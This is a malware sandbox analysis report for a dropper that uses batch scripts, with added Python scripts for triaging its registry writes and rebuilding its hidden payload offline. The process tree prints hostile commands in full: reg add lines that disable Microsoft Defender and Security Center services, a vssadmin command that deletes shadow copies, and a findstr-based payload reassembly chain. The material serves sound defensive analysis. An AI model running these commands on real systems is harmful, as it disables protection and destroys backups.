C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"6⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
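The ControlSet001.bat subtree above is a registry-level attempt to switch off Microsoft Defender: it sets the engine, real-time protection, ETW autologger, SmartScreen, cloud (MAPS) reporting and notification values, then sets the Defender and Security Center services to Start=4 (SERVICE_DISABLED) under both ControlSet001 and CurrentControlSet, and finally deletes shadow copies. The renamed helper dropped as kernel32.exe re-launches itself twice (/SW:0, then /TI/) before running each reg.exe; the tree does not identify the tool, so nothing below depends on it. Two caveats when reading the tree: with Tamper Protection enabled, Defender may ignore or revert most of these policy and service writes even though reg.exe reports success (the batch's own `Get-MpPreference` call at the end is the check an analyst should also make), and a changed Start value only takes effect at the next service start. The script below is an added example, not part of the report and not any tool's own code. It parses the tree lines exactly as they are fused above ("<image path><command line><depth>⤵"), classifies each `reg add` by the defence it impairs and counts the `vssadmin` and loopback `ping` delay lines; the regexes, category labels and helper functions are the example's own.

```python
"""Triage a sandbox process tree for Defender-tampering registry writes.
Added example; not part of the sandbox report and not any tool's API. Sample
lines are copied from the process tree above and keep the report's fusion of
image path, command line and depth marker."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Each tree line ends in the child depth plus an arrow ("/f6⤵"). A one-digit
# depth is assumed; a two-digit depth after an argument that itself ends in a
# digit cannot be separated reliably in this extraction.
DEPTH_MARKER = re.compile(r"\d?⤵\s*$")
# First "reg[.exe] add" in the line; the image path is fused in front of it
# ('reg.exereg add', 'reg.exe"C:\...\reg.exe" add'), so search, do not anchor.
REG_ADD = re.compile(r'reg(?:\.exe)?"?\s+add\s+(.*)$', re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')          # Windows-style double quoting
SERVICE_KEY = re.compile(r"\\services\\([^\\]+)$", re.IGNORECASE)
SHADOW_DELETE = re.compile(r'vssadmin(?:\.exe)?"?\s+delete\s+shadows', re.IGNORECASE)
LOOPBACK_PING = re.compile(r'ping(?:\.exe)?"?\s+-n\s+\d+\s+127\.0\.0\.1$', re.IGNORECASE)

@dataclass
class RegWrite:
    key: str
    value: Optional[str] = None      # None: no /v given; "": /ve (default value)
    vtype: Optional[str] = None
    data: Optional[str] = None
    force: bool = False

def parse_reg_add(line: str) -> Optional[RegWrite]:
    """Return the registry write described by a `reg add` tree line, or None."""
    m = REG_ADD.search(DEPTH_MARKER.sub("", line))
    if not m:
        return None
    toks = [bare or quoted for quoted, bare in TOKEN.findall(m.group(1))]
    if not toks:
        return None
    w = RegWrite(key=toks[0])
    fields = {"/v": "value", "/t": "vtype", "/d": "data"}
    i = 1
    while i < len(toks):
        flag = toks[i].lower()
        if flag == "/f":
            w.force = True
        elif flag == "/ve":
            w.value = ""
        elif flag in fields and i + 1 < len(toks):
            setattr(w, fields[flag], toks[i + 1])
            i += 1
        i += 1
    if w.vtype:
        w.vtype = w.vtype.upper()    # reg.exe accepts reg_DWORD and REG_DWORD alike
    return w

def classify(w: RegWrite) -> str:
    """Name the defence a write impairs (labels are this example's own)."""
    key, val = w.key.lower(), (w.value or "").lower()
    svc = SERVICE_KEY.search(w.key)
    if svc and val == "start" and w.data == "4":             # 4 == SERVICE_DISABLED
        return "service disabled: " + svc.group(1)
    if "autologger\\defender" in key and val == "start" and w.data == "0":
        return "Defender ETW autologger disabled"
    if key.endswith("windows defender\\real-time protection") and val.startswith("disable") and w.data == "1":
        return "Defender real-time protection disabled"
    if key.endswith("\\windows defender") and val in ("disableantispyware", "disableantivirus") and w.data == "1":
        return "Defender engine disabled"
    if key.endswith("windows defender\\features") and "tamperprotection" in val:
        return "Defender tamper-protection values modified"
    if "smartscreen" in key or "smartscreen" in val or "phishingfilter" in key or key.endswith("\\apphost"):
        return "SmartScreen / phishing filter disabled"
    if "spynet" in key:
        return "Defender cloud (MAPS) reporting disabled"
    if "security center\\notifications" in key or "security center\\systray" in key:
        return "security notifications suppressed"
    return "other registry write"

def triage_lines(lines: List[str]) -> Counter:
    """Count impaired defences and other notable commands across tree lines."""
    counts: Counter = Counter()
    for line in lines:
        stripped = DEPTH_MARKER.sub("", line)
        w = parse_reg_add(line)
        if w is not None:
            counts[classify(w)] += 1
        elif SHADOW_DELETE.search(stripped):
            counts["shadow copies deleted"] += 1
        elif LOOPBACK_PING.search(stripped):
            counts["loopback ping used as delay"] += 1
    return counts

# Constructed subset of lines copied from the process tree above.
SAMPLE_LINES = [
    r'C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f6⤵',
    r'C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵',
    r'C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f6⤵',
    r'C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f6⤵',
    r'C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵',
    r'C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵',
    r'C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵',
]

if __name__ == "__main__":
    for category, n in sorted(triage_lines(SAMPLE_LINES).items()):
        print(f"{n:3d}  {category}")
```

Feed it the whole tree (one line per process) to get a per-defence tally rather than reading two hundred reg.exe lines by hand; the "service disabled" entries will appear twice per service because the batch writes both ControlSet001 and CurrentControlSet, which on most hosts are the same key.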
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\execute.bat" "5⤵
-
C:\Windows\SysWOW64\mode.commode 65,106⤵
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e file.zip -p___________25092pwd17773pwd27010___________ -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_11.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_10.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_9.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_8.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\eDbwCBj.exe"eDbwCBj.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\at.exeat.exe7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Speranza.bmp7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^MRGsyaFvsBfEYwHcFenTgTsUhffAiSwxLsmKcSPEfQgUfzhvsafEbXnSmMrPetfmmVTGCWZNhUDnFbETwTpPDbWOTGlJOZBkBPcxAHUxzCdCzqheilOpVmVwYtNVMfYhaaWP$" Baciocchi.bmp9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.comNemica.exe.com q9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com q10⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe11⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
-
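The execute.bat subtree above shows a second-stage loader being reassembled from data files: `cmd < Speranza.bmp` feeds a script to a child cmd.exe, that script runs `findstr /V /R "^<marker>$" Baciocchi.bmp`, which prints every line of Baciocchi.bmp that is not exactly the marker string, and the next process is `Nemica.exe.com q`, which re-launches itself and spawns RegAsm.exe with SetThreadContext activity (consistent with injection into the .NET host, though the tree does not show the injected payload). The redirection that turns findstr's output into Nemica.exe.com is not visible in the tree, so that file name is an assumption. The script below is an added example, not part of the report, for rebuilding such a payload offline without running the dropper. It emulates findstr's anchored /V match byte for byte; since findstr is a text tool, its handling of a file it does not treat as text can differ, so compare the result's hash with the dropped file from the sandbox before trusting it. The marker is the one in the findstr command above; the MZ/PE stub and container are constructed here.

```python
"""Rebuild a payload hidden behind `findstr /V /R "^<marker>$"`.
Added example; not part of the sandbox report. The marker is the one in the
findstr command above; the output file name and the MZ/PE sample are this
example's own assumptions."""
import struct
import sys

MARKER = b"MRGsyaFvsBfEYwHcFenTgTsUhffAiSwxLsmKcSPEfQgUfzhvsafEbXnSmMrPetfmmVTGCWZNhUDnFbETwTpPDbWOTGlJOZBkBPcxAHUxzCdCzqheilOpVmVwYtNVMfYhaaWP"

def strip_marker_lines(blob: bytes, marker: bytes) -> bytes:
    """Emulate `findstr /V /R "^marker$"`: drop every line that is exactly the
    marker (a trailing CR is ignored for the comparison), keep all other bytes."""
    kept = []
    for line in blob.split(b"\n"):
        body = line[:-1] if line.endswith(b"\r") else line
        if body != marker:
            kept.append(line)
    return b"\n".join(kept)

def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def build_constructed_payload() -> bytes:
    """A minimal MZ/PE stub (constructed, not runnable) with LF bytes inside it."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3A)          # DOS header up to e_lfanew
    stub += struct.pack("<I", 0x40)                   # e_lfanew -> offset 0x40
    stub += b"PE\0\0" + b"\x4c\x01\x03\x00\n\x00\x00\x00\n\x00"
    return bytes(stub)

def build_constructed_container(payload: bytes, marker: bytes) -> bytes:
    """Interleave marker lines with the payload (constructed): one marker line at
    the start and after every LF, so removing them restores the payload exactly."""
    pieces = payload.split(b"\n")
    return b"\n".join(marker + b"\r\n" + piece for piece in pieces)

if __name__ == "__main__":
    if len(sys.argv) == 3:        # usage: python rebuild.py Baciocchi.bmp Nemica.exe.com
        with open(sys.argv[1], "rb") as fh:
            rebuilt = strip_marker_lines(fh.read(), MARKER)
        with open(sys.argv[2], "wb") as out:
            out.write(rebuilt)
        print(len(rebuilt), "bytes;", "PE header present" if looks_like_pe(rebuilt) else "no PE header")
    else:
        container = build_constructed_container(build_constructed_payload(), MARKER)
        print(looks_like_pe(strip_marker_lines(container, MARKER)))   # True
```

Run it against the dropped Baciocchi.bmp with the marker taken verbatim from the findstr command line; if the result does not start with an MZ header, the marker was mistyped or the dropper used a different delimiter than an exact-line match.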
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 120 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\ConsoleApp\7za.exe
MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\ConsoleApp\ControlSet000.bat
MD5: 88105ac7d8d4bedefc5dafb4c0b8a5bf
SHA1: 09eef2b0f85f9760ad744468474214c95f3872cc
SHA256: 145bb60685ba6f37aca0a5bd87728b6f8c06d130060b80dccb536ccd4943b992
SHA512: f5bf945749e738e0962c47a393a2e33832e7ce482c263e39cfa2c3a9629d58972d9124ca723bfae72835ed7d2a1fb5fed7bd13a8fa9ab7ed0f761074fe503e58
-
C:\ProgramData\ConsoleApp\ControlSet001.bat
MD5: 7e6cf2526d9c0cecd79c00ecad8b7216
SHA1: f6a78b432858c139be69731246ea03d4381805ac
SHA256: e3352d38ac6c968581d1df26865f7c7cee34e3692c32c933ea274d84e87c932f
SHA512: 948aa58d47da7ea8f9a0c4107c89f98f84dfb3b062d5cabf48fb0b6de432fd0b7b78aafbfab61d2a5d53f6ffbab76d74ce674f7f0f67ebd080df13151b33d6ac
-
C:\ProgramData\ConsoleApp\ControlSet002.bat
MD5: bdf56efeda1e10f47d5a258211fadb72
SHA1: 641725bf63662d90b567baf3a103f860e44babc4
SHA256: fc13522de3d1b6e4d9730b46e869c1efb28a604ac32bb6ba4b08cd9c908f233c
SHA512: ebf041a4b0db7e6883943ca73264a4a4853d0d4cc4a8d699a6cbcdad1dbf8046d6469675b5f032c220f9c7aed7a130f3d66c614069ca6ff9c44db01f3d7d101f
-
C:\ProgramData\ConsoleApp\ControlSet003.vbs
MD5: cedbc2b4a64107eed135adb98b678f2d
SHA1: 6f744946e4d9d1b4fa82882f0a61cbd70468f227
SHA256: 25a6210a703c6274232184ab42c0b570bacf147870d8663e9cf04e1edf29b7bc
SHA512: ed15bfabd1056e066afeaa01cca5f32918d7da141bdc1dea8589104b50831d5acae043cf0cae0aaa9ab5aa3dabd1bffc12a4ce8e72fa483f958bc45040211ccd
-
C:\ProgramData\ConsoleApp\execute.bat
MD5: 66eddcb37eb829581fb77668b39f660a
SHA1: 902030e80e5133c2d74ff08fc58601fd02e5229c
SHA256: ec8fdbd4bbc286ea256d944ff564613ee72881f57c049e324b55f3e57c97fc88
SHA512: 3fa7da6ee8e963d9be4e3162f9c1748edb52b8594191e592c3fdb1befc357cc0787650091cffc402a2586d0b10fc5f16241f09fa9853eb65031192eced47e83f
-
C:\ProgramData\ConsoleApp\file.bin
MD5: 72b3f77a6f31efe4673bd8d9026dcb4f
SHA1: 724fd98e03faf2a2c11b0b0d444070dbc2070227
SHA256: eb472fae72a94afb69ae3be4990fd70a83d17a43db3cfbb427a6a7d21ed80f03
SHA512: a4b29a2791140ac264aad77cd07663f5d488de91b0654d3260decbc3dc16d5392887cf2e5d4e9b379a2bc68f9422bd6712a6c90edae0ded60948cd6ae88367e0
-
C:\ProgramData\ConsoleApp\hfile.bin
MD5: 0bc0ab4f89dba36e9c51689c91ed2b20
SHA1: 69ed3ebc9c922907435318d1e9bc61db4405a52e
SHA256: f142491365b35a78cac70c0139e606241d732c7f556694efc51ab07724e08f04
SHA512: 9295410dd6b84e3142368bff8f1cc480f61a6f3a67037f046111f5d6506af7543e70f03df4a7b6e296f1091b1f480500192d9d88cae54780fcc27618b01123ba
-
C:\ProgramData\ConsoleApp\kernel32.exe  (49 identical entries)
MD5: 71c7975385f73ae32b06f69dbe79290b
SHA1: 05a1197cb8bd88447199e42a75bfcf99e32f2c48
SHA256: c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c
SHA512: 1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95
-
C:\ProgramData\ConsoleApp\main.bat
MD5: 009ecb510aa6c5bb7c6ad18b88190871
SHA1: 2447ad8be485fd0a4ad58777056e387589063276
SHA256: 995cb02ffc1265c4c388ebb12cf86f45586d92d4d0fe0b38933b57a926616a05
SHA512: 9101521f4e48e4cf43ee8732ea345e135f74169317640a805b1e10e8e0661e6c326368ad46e8e8ff21ef7d241f356f7e789f8a2fd345ff3dcfaa9749f41aef30
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5: 66382a4ca6c4dcf75ce41417d44be93e
SHA1: 8132cbef1c12f8a89a68a6153ade4286bf130812
SHA256: a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56
SHA512: 2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: a9fe1bc53976e38916831c0e70ff97a0
SHA1: b746646867952816985212663b52677679c2aba7
SHA256: 9ae672223b175308f77b9e45bcc4ec147acf061bcf220607141dcb302188cefd
SHA512: 2c5403f4b8ff363711a1f57517552b0794349ee0161dfa96e642811893ccbd4d29559655568dfab9ce5bfeab54e644619c46d5fa492bda9396110f47e4786188
-
C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp
MD5: b47edbfaeb92311afff1f8d47f5d79c5
SHA1: 4b159e1c59ebda84e09087aa31e6b4b3509126eb
SHA256: 22269a12aac01b099c8e46b69b2befe430aab80381e90aa74c0daad19b01efbe
SHA512: 32f3cd00c46bc559ff22de6840dee187098f2a9b63bbe4d24ba9b9cb6cdd3c8d270359617d343c71e3c85ee860938ac276487e75c4fb06a5817c7f036e32f9c1
-
\Users\Admin\AppData\Local\Temp\is-2DK6N.tmp\_isetup\_iscrypt.dll
MD5: a69559718ab506675e907fe49deb71e9
SHA1: bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256: 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512: e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
memory/184-188-0x0000000000000000-mapping.dmp
-
memory/188-142-0x0000000000000000-mapping.dmp
-
memory/200-187-0x0000000000000000-mapping.dmp
-
memory/324-210-0x0000000000000000-mapping.dmp
-
memory/364-162-0x00000000096D0000-0x00000000096D1000-memory.dmp
Filesize: 4KB
-
memory/364-136-0x0000000007990000-0x0000000007991000-memory.dmp
Filesize: 4KB
-
memory/364-169-0x00000000074D3000-0x00000000074D4000-memory.dmp
Filesize: 4KB
-
memory/364-161-0x0000000009FF0000-0x0000000009FF1000-memory.dmp
Filesize: 4KB
-
memory/364-128-0x0000000000000000-mapping.dmp
-
memory/364-129-0x00000000035C0000-0x00000000035C1000-memory.dmp
Filesize: 4KB
-
memory/364-130-0x00000000035C0000-0x00000000035C1000-memory.dmp
Filesize: 4KB
-
memory/364-131-0x00000000051B0000-0x00000000051B1000-memory.dmp
Filesize: 4KB
-
memory/364-132-0x0000000007B10000-0x0000000007B11000-memory.dmp
Filesize: 4KB
-
memory/364-134-0x00000000074D2000-0x00000000074D3000-memory.dmp
Filesize: 4KB
-
memory/364-198-0x00000000035C0000-0x00000000035C1000-memory.dmp
Filesize: 4KB
-
memory/364-133-0x00000000074D0000-0x00000000074D1000-memory.dmp
Filesize: 4KB
-
memory/364-135-0x00000000078F0000-0x00000000078F1000-memory.dmp
Filesize: 4KB
-
memory/364-146-0x00000000035C0000-0x00000000035C1000-memory.dmp
Filesize: 4KB
-
memory/364-137-0x0000000007A70000-0x0000000007A71000-memory.dmp
Filesize: 4KB
-
memory/364-141-0x0000000008340000-0x0000000008341000-memory.dmp
Filesize: 4KB
-
memory/364-143-0x0000000008240000-0x0000000008241000-memory.dmp
Filesize: 4KB
-
memory/364-144-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize: 4KB
-
memory/364-145-0x0000000008910000-0x0000000008911000-memory.dmp
Filesize: 4KB
-
memory/412-153-0x0000000000000000-mapping.dmp
-
memory/592-123-0x0000000000000000-mapping.dmp
-
memory/628-190-0x0000000000000000-mapping.dmp
-
memory/632-171-0x0000000000000000-mapping.dmp
-
memory/820-124-0x0000000000000000-mapping.dmp
-
memory/824-182-0x0000000000000000-mapping.dmp
-
memory/1036-212-0x0000000000000000-mapping.dmp
-
memory/1040-154-0x0000000000000000-mapping.dmp
-
memory/1148-149-0x0000000000000000-mapping.dmp
-
memory/1220-172-0x0000000000000000-mapping.dmp
-
memory/1264-197-0x0000000000000000-mapping.dmp
-
memory/1296-156-0x0000000000000000-mapping.dmp
-
memory/1304-192-0x0000000000000000-mapping.dmp
-
memory/1452-150-0x0000000000000000-mapping.dmp
-
memory/1468-157-0x0000000000000000-mapping.dmp
-
memory/1500-178-0x0000000000000000-mapping.dmp
-
memory/1512-194-0x0000000000000000-mapping.dmp
-
memory/1528-201-0x0000000000000000-mapping.dmp
-
memory/1568-173-0x0000000000000000-mapping.dmp
-
memory/1616-158-0x0000000000000000-mapping.dmp
-
memory/1664-186-0x0000000000000000-mapping.dmp
-
memory/1684-138-0x0000000000000000-mapping.dmp
-
memory/1720-163-0x0000000000000000-mapping.dmp
-
memory/1760-202-0x0000000000000000-mapping.dmp
-
memory/1764-273-0x0000000004A30000-0x0000000004A31000-memory.dmp
Filesize: 4KB
-
memory/1764-292-0x00000000093C0000-0x00000000093C1000-memory.dmp
Filesize: 4KB
-
memory/1764-270-0x0000000007E30000-0x0000000007E31000-memory.dmp
Filesize: 4KB
-
memory/1764-302-0x0000000004A33000-0x0000000004A34000-memory.dmp
Filesize: 4KB
-
memory/1764-274-0x0000000004A32000-0x0000000004A33000-memory.dmp
Filesize: 4KB
-
memory/1764-276-0x0000000008680000-0x0000000008681000-memory.dmp
Filesize: 4KB
-
memory/1764-278-0x0000000004950000-0x0000000004951000-memory.dmp
Filesize: 4KB
-
memory/1764-285-0x00000000095E0000-0x0000000009613000-memory.dmp
Filesize: 204KB
-
memory/1764-299-0x00000000098F0000-0x00000000098F1000-memory.dmp
Filesize: 4KB
-
